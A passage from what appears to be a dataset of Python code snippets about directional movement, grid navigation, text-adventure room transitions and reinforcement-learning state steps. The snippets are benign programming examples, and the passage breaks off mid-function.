assert state_t2.position == [10, 100]\n\n assert instructions[2] == Instruction(Direction.FWD, 7)\n state_t1.apply(instructions[2])\n state_t2.apply(instructions[2])\n assert state_t1.north == 3 and state_t1.east == 17\n assert state_t2.waypoint == [4, 10]\n assert state_t2.position == [38, 170]\n\n assert instructions[3] == Instruction(Turn.RIGHT, 90)\n state_t1.apply(instructions[3])\n state_t2.apply(instructions[3])\n assert state_t1.north == 3 and state_t1.east == 17\n assert state_t2.waypoint == [-10, 4]\n assert state_t2.position == [38, 170]\n\n assert instructions[4] == Instruction(Direction.FWD, 11)\n state_t1.apply(instructions[4])\n state_t2.apply(instructions[4])\n assert state_t1.north == -8 and state_t1.east == 17\n assert state_t2.waypoint == [-10, 4]\n assert state_t2.position == [-72, 214]", "def applyAction(state, action):\r\n if action == 'N':\r\n return (state[0] - 1, state[1])\r\n\r\n if action == 'E':\r\n return (state[0], state[1] + 1)\r\n\r\n if action == 'W':\r\n return (state[0], state[1] - 1)\r\n\r\n if action == 'S':\r\n return (state[0] + 1, state[1])", "def travel(direction, x, y):\n x_new = x\n y_new = y\n for i in range(len(direction)):\n test = direction[i].lower()\n if test == 'n':\n y_new += 1\n elif test == 's':\n y_new -= 1\n elif test == 'e':\n x_new += 1\n elif test == 'w':\n x_new -= 1\n return (x_new, y_new)", "def move(self, direction):\n command = self.DIRECTIONS[direction][\"command\"]\n mem, out = self.cpu.run_program(inputs=[command])\n status = out.pop()\n if status in (1, 2):\n self.position = Point(\n self.position.x + self.DIRECTIONS[direction][\"mask\"][0],\n self.position.y + self.DIRECTIONS[direction][\"mask\"][1]\n )\n if self.display:\n self.draw_grid()\n sleep(self.delay)\n return status", "def move(self, action):\n \n currentState = self.state\n\n if action == \"up\":\n newState = (self.state[0] - 1, self.state[1])\n elif action == \"down\":\n newState = (self.state[0] + 1, self.state[1])\n elif action == \"right\":\n newState = (self.state[0], self.state[1] + 1)\n elif action == \"left\":\n newState = (self.state[0], self.state[1] - 1)\n else:\n raise NameError(action, 'This is not a valid action!')\n\n # Need to check if the new state is a legal move\n if (newState[0] >= 0) & (newState[0] <= 1) & (newState[1] >= 0) & (newState[1] <= 2):\n return newState\n else:\n print('This move takes you off the board, you have not moved!')\n return currentState", "def move(self, direction):\n try:\n\n if self.in_thing:\n print(\"You have to get out of the \" + str(*self.in_thing[-1]) +\n \" first\")\n return self\n if direction == 'north':\n if self.finished_places == 12:\n self.finished_places += 1\n return North(self.items, self.finished_places)\n if direction == 'up':\n if self.finished_places == 4:\n self.finished_places += 1\n return Up(self.items, self.finished_places)\n if direction == 'east':\n if self.finished_places == 2:\n self.finished_places += 1\n return East(self.items, self.finished_places)\n except AttributeError:\n self.items = []\n return self.move(direction)\n print(' you didn\\'t listen to my very subtle hints, i know it was hard'\n ' your lost now. if you remember the commands i told you you can'\n ' go back to where you left off and continue, just type \"QUIT\"')\n return Place(self.items, self.finished_places)\n\n # implement\n # return new instance on class", "def test_findDirection_8(self):\n startCoordinate = coordinate.Coordinate(5, 5)\n endCoordinate = coordinate.Coordinate(3, 7)\n expected_result = 8\n actual_result = rules.findDirection(startCoordinate, endCoordinate)\n self.assertEqual(actual_result, expected_result)", "def move_invalid():\n check50.run(run_command).stdin(\"EAST\").stdout(\"Invalid command.\")", "def get_valid_move_actions_(agent_direction: Grid4TransitionsEnum,\n agent_position: Tuple[int, int],\n rail: GridTransitionMap) -> Set[RailEnvNextAction]:\n valid_actions: Set[RailEnvNextAction] = OrderedSet()\n possible_transitions = rail.get_transitions(*agent_position, agent_direction)\n num_transitions = np.count_nonzero(possible_transitions)\n # Start from the current orientation, and see which transitions are available;\n # organize them as [left, forward, right], relative to the current orientation\n # If only one transition is possible, the forward branch is aligned with it.\n if rail.is_dead_end(agent_position):\n action = RailEnvActions.MOVE_FORWARD\n exit_direction = (agent_direction + 2) % 4\n if possible_transitions[exit_direction]:\n new_position = get_new_position(agent_position, exit_direction)\n valid_actions.add(RailEnvNextAction(action, new_position, exit_direction))\n elif num_transitions == 1:\n action = RailEnvActions.MOVE_FORWARD\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n valid_actions.add(RailEnvNextAction(action, new_position, new_direction))\n else:\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n if new_direction == agent_direction:\n action = RailEnvActions.MOVE_FORWARD\n elif new_direction == (agent_direction + 1) % 4:\n action = RailEnvActions.MOVE_RIGHT\n elif new_direction == (agent_direction - 1) % 4:\n action = RailEnvActions.MOVE_LEFT\n else:\n raise Exception(\"Illegal state\")\n\n new_position = get_new_position(agent_position, new_direction)\n valid_actions.add(RailEnvNextAction(action, new_position, new_direction))\n return valid_actions", "def loss_direction(direction, eps):\n return to_python_scalar(eps * (direction @ g.t()) - 0.5 * eps ** 2 * direction @ H @ direction.t())", "def loss_direction(direction, eps):\n return to_python_scalar(eps * (direction @ g.t()) - 0.5 * eps ** 2 * direction @ H @ direction.t())", "def direction(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"direction\")", "def test_findDirection_bad(self):\n startCoordinate = coordinate.Coordinate(4, 4)\n self.assertRaises(ValueError,\n rules.findDirection,\n startCoordinate,\n startCoordinate)", "def shift(self, direction):\n try:\n if direction == Direction.UP:\n return self.shift_up()\n elif direction == Direction.DOWN:\n return self.shift_down()\n elif direction == Direction.RIGHT:\n return self.shift_right()\n elif direction == Direction.LEFT:\n return self.shift_left()\n else:\n raise IndexError(\"Invalid direction {}\".format(direction))\n except IndexError as e:\n raise IndexError(e)", "def steer(self, command):\n if isinstance(command, int):\n assert command < len(self.commands)\n command = self.commands[command] # change command id into real command\n if command == 'move forward':\n self.control_conn.sendall('upO'.encode())\n elif command == 'turn left':\n self.control_conn.sendall('leftO'.encode())\n elif command == 'turn right':\n self.control_conn.sendall('rightO'.encode())\n elif command == 'stop':\n self.control_conn.send('stopO'.encode())\n else:\n print('pre', self.pre_cmd)\n self.steer(self.pre_cmd)\n command = self.pre_cmd\n self.pre_cmd = command\n return self.commands.index(command)", "def apply_one_command(old_state, command):\n direction = command[0]\n times = int(command[1:])\n for i in range(times):\n old_state = go_one_step(old_state, direction)\n yield old_state", "def man_dir():\n\n print \"\\n\" + \"-\" * 8 + \"Select Direction\" + \"-\" * 8\n print \"1. Up\"\n print \"2. Down\"\n print \"3. Left\"\n print \"4. Right\"\n choice = valid(\"\\nSelect direction: \", 1, 4)\n\n if choice == 1:\n direct = \"U\"\n elif choice == 2:\n direct = \"D\"\n elif choice == 3:\n direct = \"L\"\n elif choice == 4:\n direct = \"R\"\n return direct", "def tile_change(direction, tile):\n lower_direction = direction.lower()\n if lower_direction == \"n\":\n tile += 1\n elif lower_direction == \"s\":\n tile -= 1\n elif lower_direction == \"e\":\n tile += 10\n else:\n tile -= 10\n return tile", "def move(self, direction):\n if direction in self.linked_rooms:\n return self.linked_rooms[direction]\n else:\n print(\"You can't go that way\")\n return self", "def get_direction_to_right(self, direction):\r\n return direction_to_right[direction]", "def _get_ship_direction(self):\n direction_string = input(\"Please select the ship direction of your choice (up, down, left, right).\\n\")\n if direction_string == \"down\":\n return b_types.Coordinate(1, 0)\n elif direction_string == \"up\":\n return b_types.Coordinate(-1, 0)\n elif direction_string == \"right\":\n return b_types.Coordinate(0, 1)\n elif direction_string == \"left\":\n return b_types.Coordinate(0, -1)\n else:\n print(\"Invalid direction! Please try again (make sure casing and spelling match)\")\n return self._get_ship_direction()\n return None # will never reach return, but removes lint error", "def _next_state(self, state, action):\n\n # Transition table to define movement for each action\n if self.action_type == 'VonNeumann':\n transitions = {0: [-1, 0], 1: [+1, 0], 2: [0, -1], 3: [0, +1]}\n elif self.action_type == 'Moore':\n transitions = {0: [-1, 0], 1: [+1, 0], 2: [0, -1], 3: [0, +1],\n 4: [-1, +1], 5: [+1, +1], 6: [-1, -1], 7: [+1, -1]}\n\n new_state = [state[0] + transitions[action][0], state[1] + transitions[action][1]]\n if self.maze[new_state[0]][new_state[1]] == 1: # Hit wall, stay there\n return state\n else: # Valid move for 0, 2, 3, 4\n return new_state", "def move(self, direction):\n\n if direction == \"north\":\n self.go_and_update(-1, 0)\n\n elif direction == \"south\":\n self.go_and_update(1, 0)\n\n elif direction == \"east\":\n self.go_and_update(0, 1)\n\n elif direction == \"west\":\n self.go_and_update(0, -1)", "def move(self, direction):\r\n self.stored_direction = direction", "def next_state(self, debug=False):\n\n if self.current_state == 'NoObstacle':\n # First check if any obstacle is in sight\n if self.transitions.next_room_reached():\n self.current_state = 'RoomReached'\n elif self.transitions.obstacle_in_sight():\n self.current_state = 'Obstacle'\n\n elif self.current_state == 'Obstacle':\n # First check if obstacle is still in sight\n if self.transitions.no_obstacle_in_sight() and not self.transitions.obstacle_in_sight():\n self.current_state = 'NoObstacle'\n elif self.transitions.next_room_reached():\n self.current_state = 'RoomReached'\n\n elif self.current_state == 'RoomReached':\n self.current_state = 'InspectCorners'\n\n elif self.current_state == 'InspectCorners':\n if self.transitions.all_corners_inspected():\n if not self.transitions.all_rooms_visited():\n self.current_state = 'RotateToExit'\n else:\n self.current_state = 'Finished'\n\n elif self.current_state == 'RotateToExit':\n if self.transitions.aiming_to_carrot():\n self.current_state = 'NoObstacle'\n\n\n elif self.current_state == 'Finished':\n pass\n\n # DEBUG\n if debug:\n print 'Next state: %s' % self.current_state\n\n if self.current_state is not self.old_state:\n print self.current_state\n\n self.old_state = self.current_state\n\n return self.current_state", "def test_validate_self_invalid_transition_result_direction(self):\n with nose.assert_raises(tmexceptions.InvalidDirectionError):\n self.dtm1.transitions['q0']['y'] = ('q3', 'y', 'U')\n self.dtm1.validate_self()", "def direction(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"direction\")", "def move_length_41(self, move, new_state: \"StonehengeState\"):\n # Then consider the internal1 move\n new1_state = new_state\n if move in [\"D\", \"K\", \"M\"]:\n for i in [[\"D\", 2, 4, 4, 1, 6, 10, 14, 1, 0, 7, 12, 17, 14],\n [\"K\", 5, 15, 12, 1, 3, 6, 14, 1, 9, 11, 12, 13, 8],\n [\"M\", 8, 16, 5, 9, 10, 11, 13, 8, 0, 3, 7, 17, 14]]:\n new1_state = self.loop2(move, new_state, i)\n # Finally consider the internal2 move\n internal2 = [[\"G\", 2, 11, 16, 13, 5, 7, 8, 6, 1, 3, 10, 14, 1],\n [\"H\", 4, 11, 15, 3, 5, 6, 8, 6, 0, 3, 12, 17, 14],\n [\"L\", 2, 6, 16, 13, 4, 7, 15, 3, 9, 10, 12, 13, 8]]\n if move in [\"G\", \"H\", \"L\"]:\n for i in internal2:\n new1_state = self.loop3(move, new_state, i)\n return StonehengeState(not self.p1_turn, new1_state.length,\n new1_state.letters, new1_state.claim)", "def _calc_relative_move_direction(self, char, direction):\n if char in (\"Left\", \"Right\"):\n di = -1 if self.video.hflip else 1\n else:\n di = -1 if self.video.vflip else 1\n return direction * di", "def __isDirection__(self, word):\n self.directions = ('north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back')\n for direction in self.directions:\n if direction == word:\n return ('direction', word), True\n return None, False", "def decide_turn_direction(self, next_direction):\n\n # if facing backwards, try to initially go forwards.\n if GPIO.input(pins[\"DirectionMotorRight\"]):\n GPIO.output(pins[\"DirectionMotorRight\"], GPIO.LOW)\n GPIO.output(pins[\"DirectionMotorLeft\"], GPIO.HIGH)\n self.facing = not self.facing\n\n if self.facing == \"Right\":\n if next_direction == \"Down\":\n return \"Right\"\n elif next_direction == \"Up\":\n return \"Left\"\n else: # Left\n return \"Left\"\n\n elif self.facing == \"Left\":\n if next_direction == \"Down\":\n return \"Left\"\n elif next_direction == \"Up\":\n return \"Right\"\n else: # Right\n return \"Right\"\n\n elif self.facing == \"Up\":\n if next_direction == \"Right\":\n return \"Right\"\n elif next_direction == \"Left\":\n return \"Left\"\n else: # Down\n return \"Left\"\n\n else: # down\n if next_direction == \"Right\":\n return \"Left\"\n elif next_direction == \"Left\":\n return \"Right\"\n else: # Up\n return \"Right\"", "def move(self, movement):\n index = self.state.index(0)\n\n new_state = self.state.copy()\n\n if movement == 'up':\n new_state[index], new_state[index - 3] = new_state[index - 3], new_state[index]\n elif movement == 'down':\n new_state[index], new_state[index + 3] = new_state[index + 3], new_state[index]\n elif movement == 'left':\n new_state[index], new_state[index - 1] = new_state[index - 1], new_state[index]\n else:\n # movement == 'right'\n new_state[index], new_state[index + 1] = new_state[index + 1], new_state[index]\n \n return new_state", "def transition(s, direction):\n new_pos = [sum(x) for x in zip(s, direction)] # sum up every element at same index of two lists\n if hit_wall(new_pos):\n return s\n else:\n return new_pos", "def invalid_direction(direction):\n valid_directions = [\"forwards\", \"backwards\"]\n\n if direction not in valid_directions:\n return f\"`direction` must be one of [{', '.join(valid_directions)}]\"\n\n return False", "def get_env_feedback(S, A):\n if A == 'right':\n if S == N_STATES - 2: # reach the target\n S_ = 'terminated'\n R = 1\n else:\n S_ = S + 1\n R = 0\n else: # move left\n R = 0\n if S == 0:\n S_ = S\n else:\n S_ = S - 1\n return S_, R", "def make_step(self, current_state, action):\n\n if current_state == 12:\n current_state = current_state + 50\n elif current_state == 23:\n current_state = current_state + 25\n\n new_state = current_state\n\n if 0 <= current_state < 25:\n dimension = 1\n elif 25 <= current_state < 50:\n dimension = 2\n elif 50 <= current_state < 75:\n dimension = 3\n else:\n print(\"Error in dimension\")\n\n # Update new_position based on the chosen action and check whether agent hits a wall.\n if action == \"n\":\n temp_state = current_state + self.num_cols\n if temp_state < self.num_cells * dimension:\n new_state = temp_state\n elif action == \"e\":\n temp_state = current_state + 1\n if temp_state % self.num_cols > 0:\n new_state = temp_state\n elif action == \"s\":\n temp_state = current_state - self.num_cols\n if temp_state >= 0 + (25 * (dimension - 1)):\n new_state = temp_state\n elif action == \"w\":\n temp_state = current_state - 1\n if temp_state % self.num_cols < self.num_cols - 1:\n new_state = temp_state\n else:\n raise ValueError('Action was mis-specified!')\n\n # Get reward\n reward = self.rewards[new_state]\n\n # Deduct 1 from reward for every attempted move\n reward -= 1\n\n return (new_state, reward)", "def turn(self, dir):\n if dir.upper() == 'R':\n if self.direction == 3:\n self.direction = 0\n else:\n self.direction += 1\n if dir.upper() == 'L':\n if self.direction == 0:\n self.direction = 3\n else:\n self.direction -= 1", "def parse_next_instruction(self) -> None:\n instruction = self.program[self.pointer]\n opcode = instruction % 100\n if opcode == 99:\n self.halt = True\n\n self.modes = instruction // 100\n\n if opcode == 1:\n self.op_sum()\n if opcode == 2:\n self.op_multiply()\n if opcode == 3:\n self.op_input()\n if opcode == 4:\n self.op_output()\n if opcode == 5:\n self.op_jump_if_true()\n if opcode == 6:\n self.op_jump_if_false()\n if opcode == 7:\n self.op_less_than()\n if opcode == 8:\n self.op_equal_to()\n if opcode == 9:\n self.op_adjust_relative()", "def get_new_position_for_action(\n agent_position: Tuple[int, int],\n agent_direction: Grid4TransitionsEnum,\n action: RailEnvActions,\n rail: GridTransitionMap) -> Tuple[int, int, int]:\n possible_transitions = rail.get_transitions(*agent_position, agent_direction)\n num_transitions = np.count_nonzero(possible_transitions)\n # Start from the current orientation, and see which transitions are available;\n # organize them as [left, forward, right], relative to the current orientation\n # If only one transition is possible, the forward branch is aligned with it.\n if rail.is_dead_end(agent_position):\n valid_action = RailEnvActions.MOVE_FORWARD\n exit_direction = (agent_direction + 2) % 4\n if possible_transitions[exit_direction]:\n new_position = get_new_position(agent_position, exit_direction)\n if valid_action == action:\n return new_position, exit_direction\n elif num_transitions == 1:\n valid_action = RailEnvActions.MOVE_FORWARD\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n new_position = get_new_position(agent_position, new_direction)\n if valid_action == action:\n return new_position, new_direction\n else:\n for new_direction in [(agent_direction + i) % 4 for i in range(-1, 2)]:\n if possible_transitions[new_direction]:\n if new_direction == agent_direction:\n valid_action = RailEnvActions.MOVE_FORWARD\n if valid_action == action:\n new_position = get_new_position(agent_position, new_direction)\n return new_position, new_direction\n elif new_direction == (agent_direction + 1) % 4:\n valid_action = RailEnvActions.MOVE_RIGHT\n if valid_action == action:\n new_position = get_new_position(agent_position, new_direction)\n return new_position, new_direction\n elif new_direction == (agent_direction - 1) % 4:\n valid_action = RailEnvActions.MOVE_LEFT\n if valid_action == action:\n new_position = get_new_position(agent_position, new_direction)\n return new_position, new_direction", "def step(action, state):\n observation = state\n reward = 0\n done = False\n if action == \"right\":\n if state == N_STATES - 2:\n observation = \"terminal\"\n reward = 1\n done = True\n else:\n observation = state + 1\n else:\n # move left\n if state != 0:\n observation = state - 1\n return observation, reward, done", "def move(self, direction):\n try:\n direction = self._DIRECTIONS[direction]\n except KeyError:\n raise CommandCannotBeExecuted\n new_room = self._room.get_neighbor(direction)\n if new_room:\n self._room = new_room\n self._rooms_already_visited.add(str(self._room))\n self._room.update_player(self)\n if self.have_won():\n raise ThePlayerWonTheGame\n return \"You are now in: {} \".format(str(self._room))\n else:\n raise CommandCannotBeExecuted", "def input(self, symbol, *args, **kwargs):\n if self.__state is None:\n raise ValueError(\"FSM state is undefined\")\n try:\n transition = self.__get_state_attr(self._transition_prefix)\n except AttributeError:\n raise Exception(\"unable to find transition function or target\")\n if callable(transition):\n new_state = transition(symbol)\n elif isinstance(transition, dict):\n new_state = transition[symbol]\n else:\n new_state = transition\n return None if new_state is None else self.enter(new_state, *args, **kwargs)", "def _convert_direction(direction: str) -> Tuple[float, int]:\n\n direction_to_heading = {\"L\": math.pi / 2, \"R\": -math.pi / 2}\n\n return direction_to_heading[direction[0]], int(direction[1])", "def tryDirection(d, currentRoom):\n attrib = d + '_to'\n\n # See if the room has the destination attribute\n if hasattr(currentRoom, attrib):\n # If so, return its value (the next room)\n return getattr(currentRoom, attrib)\n\n # Otherwise print an error and stay in the same room\n print(\"Where do you think your going?\")\n\n return currentRoom", "def opposite(self):\n if self.direction == 8: return Direction(8)\n n = self.direction + 4\n if n >= 8: n -= 8\n return Direction(n)", "def _coordinate_after_moving(self, direction, coordinate):\n\n if direction == 'N':\n new_coordinate = Coordinate(coordinate.x, coordinate.y + 1)\n elif direction == 'S':\n new_coordinate = Coordinate(coordinate.x, coordinate.y - 1)\n elif direction == 'W':\n new_coordinate = Coordinate(coordinate.x - 1, coordinate.y)\n else:\n new_coordinate = Coordinate(coordinate.x + 1, coordinate.y)\n\n if not self._is_coordinate_in_the_grid(new_coordinate):\n raise RoverException(ExceptionMessages.OFF_GRID)\n\n if self._is_coordinate_occupied(new_coordinate):\n raise RoverException(ExceptionMessages.ROVER_COLLISION)\n\n return new_coordinate", "def nextPositionOffset(self):\n if self.dir == \"N\":\n return (0, -1)\n elif self.dir == \"S\":\n return (0, 1)\n elif self.dir == \"E\":\n return (1, 0)\n elif self.dir == \"W\":\n return (-1, 0)\n else:\n raise TypeError(\"invalid direction '%s'\" % self.dir)", "def make_move(self, direction):\r\n\t\tif direction == 0:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x-1][self.y] = self.board[self.x-1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x -= 1\r\n\r\n\t\telif direction == 1:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y+1] = self.board[self.x][self.y+1], self.board[self.x][self.y]\r\n\t\t\tself.y += 1\r\n\r\n\t\telif direction == 2:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x+1][self.y] = self.board[self.x+1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x += 1\r\n\r\n\t\telif direction == 3:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y-1] = self.board[self.x][self.y-1], self.board[self.x][self.y]\r\n\t\t\tself.y -= 1", "def test_findDirection_1(self):\n startCoordinate = coordinate.Coordinate(5, 5)\n endCoordinate = coordinate.Coordinate(5, 7)\n expected_result = 1\n actual_result = rules.findDirection(startCoordinate, endCoordinate)\n self.assertEqual(actual_result, expected_result)", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_state = StonehengeState(self.p1_turn, self.length,\n self.letters[:], self.claim[:])\n state = new_state\n if new_state.length == 1:\n state = self.move_length_1(move, new_state)\n if new_state.length == 2:\n state = self.move_length_2(move, new_state)\n if new_state.length == 3:\n state = self.move_length_3(move, new_state)\n if new_state.length == 4:\n if move in [\"A\", \"B\", \"J\", \"O\", \"N\", \"R\",\n \"C\", \"F\", \"E\", \"I\", \"P\", \"Q\"]:\n state = self.move_length_4(move, new_state)\n else:\n state = self.move_length_41(move, new_state)\n if new_state.length == 5:\n if move in [\"A\", \"B\", \"U\", \"O\", \"T\", \"Y\",\n \"C\", \"J\", \"E\", \"N\", \"V\", \"X\"]:\n state = self.move_length_5(move, new_state)\n elif move in [\"F\", \"I\", \"W\"]:\n state = self.move_length_51(move, new_state)\n else:\n state = self.move_length_52(move, new_state)\n return state", "def movee(self):\n\n #return the initial state if he cant move and he's in the initial state\n if not self.move and self.index == 0:\n return self.path[self.index]\n\n #return the goal state if he's at the goal state\n if self.index == len(self.path):\n return self.path[-1]\n\n #return the next move and increments the index attribute\n nextMove = self.path[self.index]\n self.index += 1\n\n return nextMove", "def get_dir_from_path(self):\n try:\n next_step = self.return_path[0]\n if next_step[0] > self.tile[0]:\n return 'd' # move up next\n if next_step[0] < self.tile[0]:\n return 'u' # move down next\n if next_step[1] > self.tile[1]:\n return 'r' # move right next\n if next_step[1] < self.tile[1]:\n return 'l' # move left next\n except IndexError as ie:\n print('Error while trying to get new path direction', ie)\n return None", "def move(self, direction, no_of_exits):\n if direction in NS:\n self.y = shift[direction](self.y)\n else:\n self.x = shift[direction](self.x)\n\n # Store new movement\n self.path.append([self.x, self.y])\n\n # Stores new tested junction direction after reset\n if self.moved() is False:\n self._dead_end_direction[-1].append(direction)\n\n # Stores the direction and location when testing a new junction.\n if no_of_exits > 1 and self.moved() is True:\n self._dead_end_direction.append([direction])\n self._junction_index.append(len(self.fullpath()) - 1)\n\n self._moved = True", "def step(self, action):\n x, y = self.state_to_coord(self.current_state)\n if action == self.actions['up']:\n possible_next_state = self.coord_to_state(x - 1, y)\n if x - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n elif possible_next_state in self.goal_states:\n result = possible_next_state, self.goal_reward, True\n else:\n result = possible_next_state, self.step_reward, False\n elif action == self.actions['right']:\n possible_next_state = self.coord_to_state(x, y + 1)\n if y + 1 >= self.columns or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['left']:\n possible_next_state = self.coord_to_state(x, y - 1)\n if y - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['down']:\n possible_next_state = self.coord_to_state(x + 1, y)\n if x + 1 >= self.rows or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n else:\n raise ValueError('Expected action value in {}, received {} in state {}'.\n format(self.actions, action, self.state_to_coord(self.current_state)))\n\n self.current_state = result[0]\n return result", "def check_condition(direction, steps):\n assert direction in ['L', 'R', 'U', 'D'], \"Direction information has an incorrect alphabet\"\n assert steps > 0, \"Step value is zero\"", "def _set_transition(\n self, current_state, current_symbol, next_symbol, direction, next_state\n ):\n self._set_symbol(current_symbol)\n self._set_symbol(next_symbol)\n self._set_state(current_state)\n self._set_state(next_state)\n\n if self._transitions.get(current_state) is None:\n self._transitions[current_state] = {}\n\n self._transitions[current_state][current_symbol] = (\n next_symbol,\n direction,\n next_state,\n )", "def get_move(self, legal):\n move = Directions.STOP\n if (self.WEST_KEY in self.keys) and Directions.WEST in legal:\n move = Directions.WEST\n if (self.EAST_KEY in self.keys) and Directions.EAST in legal:\n move = Directions.EAST\n if (self.NORTH_KEY in self.keys) and Directions.NORTH in legal:\n move = Directions.NORTH\n if (self.SOUTH_KEY in self.keys) and Directions.SOUTH in legal:\n move = Directions.SOUTH\n return move", "def _move(self, direction) -> bool:\n if direction == K_UP:\n return self._move_up()\n elif direction == K_DOWN:\n return self._move_down()\n elif direction == K_LEFT:\n return self._move_left()\n elif direction == K_RIGHT:\n return self._move_right()\n else:\n raise ValueError(f\"This method is not equipped to handle the given key: {direction}\")", "def move(self, m):\n if m not in \"RLUD\":\n raise ValueError(\n (\"Not a legal move: '{}', should be one of \" +\n \"the 'RLUD'.\").format(m))\n if m not in self.legal_moves:\n raise ValueError(\n (\"Not a legal move at this state: '{}', \" +\n \"should be one of the '{}'.\").format(m, self.legal_moves))\n\n posdiff = (0, 0)\n if m == 'L':\n posdiff = (0, 1)\n elif m == 'R':\n posdiff = (0, -1)\n elif m == 'U':\n posdiff = (1, 0)\n elif m == 'D':\n posdiff = (-1, 0)\n\n empty_position = self.get_position(0)\n newpuz = self.swap((empty_position[0] - posdiff[0],\n empty_position[1] - posdiff[1]))\n return newpuz", "def convert_to_transition(env: RailEnv, conv: StateConverter):\r\n\r\n # Transition is a function: [state][action] -> new state\r\n # Transition will be 2D Matrix initially fill with 1 with\r\n # - size of row = number of states\r\n # - size of column = number of action (default = 5)\r\n # If the train in state i and it takes action j then it will get the new state at transition[state=i][action=j]\r\n transition = -np.ones((conv.num_states, 5), dtype=np.int32)\r\n\r\n # Action is valid in a particular state if it leads to a new position.\r\n # There are five actions so size of column will be 5\r\n\r\n # Example: if a train in state i and want to do action j\r\n # then it needs to check if the valid_action[i][j] (if valid_action[i][j]==1 the train can do the action)\r\n valid_action = np.zeros((conv.num_states, 5), dtype=np.int32)\r\n\r\n # Compute the valid_action and transition tables\r\n for row in range(0, env.rail.height):\r\n for col in range(0, env.rail.width):\r\n for dir in range(0, 4):\r\n # For each direction, each col and each row\r\n\r\n # Convert the current position to state\r\n state = conv.position_to_state(row, col, dir)\r\n\r\n # Compute the number of possible transitions.\r\n # First we get the possible transition for the current state.\r\n # The \"get_transitions\" function returns a tuple (0 or 1,0 or 1,0 or 1,0 or 1). It shows us which\r\n # direction agent can take\r\n possible_transitions = env.rail.get_transitions(row, col, dir)\r\n # Count the number of direction we can go in current state\r\n num_transitions = np.count_nonzero(possible_transitions)\r\n\r\n if num_transitions > 0:\r\n\r\n # The easy case: stop moving holds current state. (Agent can stop moving at every state\r\n\r\n # Since the action is stop moving, after doing this action\r\n # the new state will be the same as the old state\r\n transition[state][RailEnvActions.STOP_MOVING] = state\r\n # Set to valid action (=1)\r\n valid_action[state][RailEnvActions.STOP_MOVING] = 1\r\n\r\n # Forward is only possible in two cases, there is only 1 option mean there is only one rail, or\r\n # the current direction can be maintained. Stop otherwise.\r\n\r\n # There is only one option for agent\r\n if num_transitions == 1:\r\n # Get the index where possible_transition == 1 , the index implies the new direction after agent\r\n # continue moving forward\r\n new_direction = np.argmax(possible_transitions)\r\n # Calculate new position when apply the only transition we just found\r\n new_position = get_new_position((row, col), new_direction)\r\n # Calculate new state\r\n transition[state][RailEnvActions.MOVE_FORWARD] = conv.position_to_state(new_position[0],\r\n new_position[1],\r\n new_direction)\r\n # Set to valid_action\r\n valid_action[state][RailEnvActions.MOVE_FORWARD] = 1\r\n\r\n # If there are more than one transition and one of the transition has the same direction as the\r\n # agent is facing\r\n elif possible_transitions[dir] == 1:\r\n new_position = get_new_position((row, col), dir)\r\n transition[state][RailEnvActions.MOVE_FORWARD] = conv.position_to_state(new_position[0],\r\n new_position[1], dir)\r\n valid_action[state][RailEnvActions.MOVE_FORWARD] = 1\r\n # If there is no option, the agent will stay\r\n else:\r\n transition[state][RailEnvActions.MOVE_FORWARD] = state\r\n\r\n # Left is only possible if there is a transition out to the left of\r\n # the current direction. Otherwise, we move like we would if going Forward.\r\n new_direction = (dir - 1) % 4\r\n # If there is a transition out to the left of the current direction\r\n if possible_transitions[new_direction]:\r\n new_position = get_new_position((row, col), new_direction)\r\n transition[state][RailEnvActions.MOVE_LEFT] = conv.position_to_state(new_position[0],\r\n new_position[1],\r\n new_direction)\r\n # If moving the left and moving forward are not end up in the same state, set Move_left action\r\n # = 1\r\n valid_action[state][RailEnvActions.MOVE_LEFT] = transition[state][RailEnvActions.MOVE_LEFT] != \\\r\n transition[state][RailEnvActions.MOVE_FORWARD]\r\n else:\r\n transition[state][RailEnvActions.MOVE_LEFT] = transition[state][RailEnvActions.MOVE_FORWARD]\r\n\r\n # Right is only possible if there is a transition out to the Right of\r\n # the current direction. Otherwise, we move like we would if going\r\n # Forward.\r\n new_direction = (dir + 1) % 4\r\n if possible_transitions[new_direction]:\r\n new_position = get_new_position((row, col), new_direction)\r\n transition[state][RailEnvActions.MOVE_RIGHT] = conv.position_to_state(new_position[0],\r\n new_position[1],\r\n new_direction)\r\n valid_action[state][RailEnvActions.MOVE_RIGHT] = transition[state][RailEnvActions.MOVE_RIGHT] != \\\r\n transition[state][RailEnvActions.MOVE_FORWARD]\r\n else:\r\n transition[state][RailEnvActions.MOVE_RIGHT] = transition[state][RailEnvActions.MOVE_FORWARD]\r\n\r\n return (transition, valid_action)", "def movement(scale, direction):\n try:\n if direction == left:\n args[0].umvr(-scale, log=False, newline=False)\n elif direction == right:\n args[0].umvr(scale, log=False, newline=False)\n elif direction == up:\n args[1].umvr(scale, log=False, newline=False)\n elif direction == down:\n args[1].umvr(-scale, log=False, newline=False)\n except Exception as exc:\n logger.error('Error in tweak move: %s', exc)\n logger.debug('', exc_info=True)", "def get_next_state(self, state, action):\n pass", "def get_direction_to_left(self, direction):\r\n return direction_to_left[direction]", "def move(exits, direction):\r\n return rooms[exits[direction]]", "def processInput(direction):\n userinput = screen.getch()\n if userinput == curses.KEY_UP:\n direction = 3\n elif userinput == curses.KEY_DOWN:\n direction = 2\n elif userinput == 